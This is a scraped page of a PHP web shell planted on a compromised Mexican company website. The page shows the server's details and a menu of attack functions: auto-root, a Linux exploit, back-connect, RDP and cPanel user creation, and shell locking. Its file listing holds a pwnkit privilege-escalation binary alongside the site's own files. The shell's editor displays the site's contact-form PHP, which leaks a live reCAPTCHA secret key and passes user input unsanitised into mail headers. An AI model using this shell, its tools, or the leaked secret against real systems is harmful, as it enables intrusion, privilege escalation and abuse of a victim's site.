Linux cool-chatelet.209-46-124-25.plesk.page 6.8.0-60-generic #63-Ubuntu SMP PREEMPT_DYNAMIC Tue Apr 15 19:04:15 UTC 2025 x86_64
nginx/1.26.3
: 209.46.124.25 | : 216.73.216.5
Cant Read [ /etc/named.conf ]
8.3.21
beghelli.com.mx_t822czighbk
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
var /
www /
vhosts /
beghelli.com.mx /
httpdocs /
php /
[ HOME SHELL ]
Name
Size
Permission
Action
.pkexec
[ DIR ]
drwxr-xr-x
GCONV_PATH=.
[ DIR ]
drwxr-xr-x
.mad-root
0
B
-rw-r--r--
adminer.php
465.43
KB
-rw-r--r--
contact-form.php
6.87
KB
-rw-r--r--
email-template.html
4.96
KB
-rw-r--r--
providerLogin.php
642
B
-rw-r--r--
pwnkit
10.99
KB
-rwxr-xr-x
representantLogin.php
649
B
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : contact-form.php
<?php $token = $_POST['token']; $cu = curl_init(); curl_setopt($cu, CURLOPT_URL, "https://www.google.com/recaptcha/api/siteverify"); curl_setopt($cu, CURLOPT_POST, 1); curl_setopt($cu, CURLOPT_POSTFIELDS, http_build_query(array('secret'=> '6Le0kkkqAAAAAObem5QWpfN6ZyN5ZMgYT4wKNtUy', 'response'=> $token))); curl_setopt($cu, CURLOPT_RETURNTRANSFER, true); $response = curl_exec($cu); curl_close($cu); $arr = json_decode($response, TRUE); if($arr['success'] == false && $arr['score'] <= 0.5) { $result = [ 'status' => "error", 'message' => "Error al validar el captcha." ]; echo json_encode($result); exit; } $name = $_POST['name']; $phone = $_POST['phone']; $email = $_POST['email']; $state = $_POST['state']; $company = $_POST['company']; $message = $_POST['message']; if (empty($name) || empty($email) || empty($state) || empty($message)) { $result = [ 'status' => "error", 'message' => "Información incompleta. Los campos indicados son obligatorios." ]; echo json_encode($result); exit; } $phone_li = !empty($phone) ? "<li><b>Teléfono: </b>$phone</li>" : ""; $company_li = !empty($company) ? "<li><b>Compañía: </b>$company</li>" : ""; $phone_link = empty($phone) ? "" : "<a href='tel:$phone' style='width: min-content; height: 25px; text-decoration: none;'> <svg xmlns='' viewBox='0 0 512 512' height='25px' style='fill: #9FAAB1;'> <!--!Font Awesome Free 6.5.2 by @fontawesome - https://fontawesome.com License - https://fontawesome.com/license/free Copyright 2024 Fonticons, Inc.--> <path d='M164.9 24.6c-7.7-18.6-28-28.5-47.4-23.2l-88 24C12.1 30.2 0 46 0 64C0 311.4 200.6 512 448 512c18 0 33.8-12.1 38.6-29.5l24-88c5.3-19.4-4.6-39.7-23.2-47.4l-96-40c-16.3-6.8-35.2-2.1-46.3 11.6L304.7 368C234.3 334.7 177.3 277.7 144 207.3L193.3 167c13.7-11.2 18.4-30 11.6-46.3l-40-96z'/> </svg> </a>"; $to = ""; $subject = "Nuevo envío del formulario de contacto"; $html = "<!DOCTYPE html PUBLIC \"-//W3C//DTD XHTML 1.0 Transitional //EN' 'http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd\"> <html xmlns='http://www.w3.org/1999/xhtml' xmlns:o='urn:schemas-microsoft-com:office:office' xmlns:v='urn:schemas-microsoft-com:vml' lang='es'> <head> <title>Beghelli México</title> <meta property='og:title' content='Dolcemondo Email' /> <meta http-equiv='Content-Type' content='text/html; charset=UTF-8'> <meta http-equiv='X-UA-Compatible' content='IE=edge'> <meta name='viewport' content='width=device-width, initial-scale=1.0'> <style type='text/css'> * { margin: 0; box-sizing: border-box; } </style> </head> <body style='min-height: 100vh; color: #000000; font-family: \"Trebuchet MS\", \"Lucida Sans Unicode\", \"Lucida Grande\", \"Lucida Sans\", Arial, sans-serif;'> <div class='mail-cont' style='display: block; padding: 4rem 1rem 3rem 1rem; min-height: 100vh; background-color: #F2F2F2;'> <img src='../assets/img/logo-blue.svg' alt='Beghelli logo' style='display: block; margin: 0 auto 3rem auto; height: 60px; object-fit: contain;'> <div style='display: block; margin: 0 auto; padding: 4rem 2rem; width: 100%; max-width: 750px; background-color: #FFFFFF; border-radius: 45px;'> <h1 style='margin-bottom: 3rem; color: #00AEEF; text-align: center; font-size: 1.8em; font-weight: 700;'>Formulario de Contacto</h1> <h3 style='margin-bottom: 1.5rem; font-size: 1.25em; line-height: 1.45em;'> Datos del solicitante </h3> <ul style='margin-bottom: 2rem; font-size: 1em; line-height: 1.3em;'> <li><b>Nombre: </b>$name</li> $company_li $phone_li <li><b>Correo: </b>$email</li> <li><b>Estado: </b>$state</li> </ul> <h3 style='font-size: 1.25em; line-height: 1.45em;'> Mensaje </h3> <p style='margin: 1rem 0 3rem 0; padding: 0 30px; color: #000000;'>$message</p> <img style='display: block; margin: 0 auto 3rem auto; width: 100%; max-width: 300px; border-radius: 15px; object-fit: contain;' src='../assets/img/email-img.jpg' alt='Iluminación parque'> <div class='spacer' style='display: block; margin: 4rem 0; width: 100%; height: 3px; background-color: #D9D9D9; border-radius: 1.5px;'></div> <h3 style='margin: 2rem 0; text-align: center; font-size: 1.15em; line-height: 1.45em;'>Enlaces de contacto:</h3> <div class='sm-grid' style='display: block; margin: 0 auto 4rem auto; width: max-content;'> $phone_link <a href='mailto:$email' style='margin-left: 1.2rem; height: 25px; text-decoration: none;'> <svg xmlns='http://www.w3.org/2000/svg' viewBox='0 0 448 512' width='30px' height='25px' style='fill: #9FAAB1;'> <!--!Font Awesome Free 6.5.2 by @fontawesome - https://fontawesome.com License - https://fontawesome.com/license/free Copyright 2024 Fonticons, Inc.--> <path d='M48 64C21.5 64 0 85.5 0 112c0 15.1 7.1 29.3 19.2 38.4L236.8 313.6c11.4 8.5 27 8.5 38.4 0L492.8 150.4c12.1-9.1 19.2-23.3 19.2-38.4c0-26.5-21.5-48-48-48H48zM0 176V384c0 35.3 28.7 64 64 64H448c35.3 0 64-28.7 64-64V176L294.4 339.2c-22.8 17.1-54 17.1-76.8 0L0 176z'/> </svg> </a> </div> <div class='spacer' style='display: block; margin: 4rem 0; width: 100%; height: 3px; background-color: #D9D9D9; border-radius: 1.5px;'></div> <p style='margin: 4rem 0 1rem 0; text-align: center; font-size: 1em; line-height: 1.3em;'> Beghelli México, 2024. Todos los derechos reservados. </p> </div> </div> </body> </html>"; $headers = "MIME-Version: 1.0" . "\r\n"; $headers .= "Content-type:text/html;charset=UTF-8" . "\r\n"; $headers .= "From: $email" . "\r\n"; $result = [ 'status' => "success", 'message' => "" ]; if(!mail($to, $subject, $html, $headers)){ $result = [ 'status' => "error", 'message' => "Fallo al enviar el correo." ]; } echo json_encode($result); ?>
Close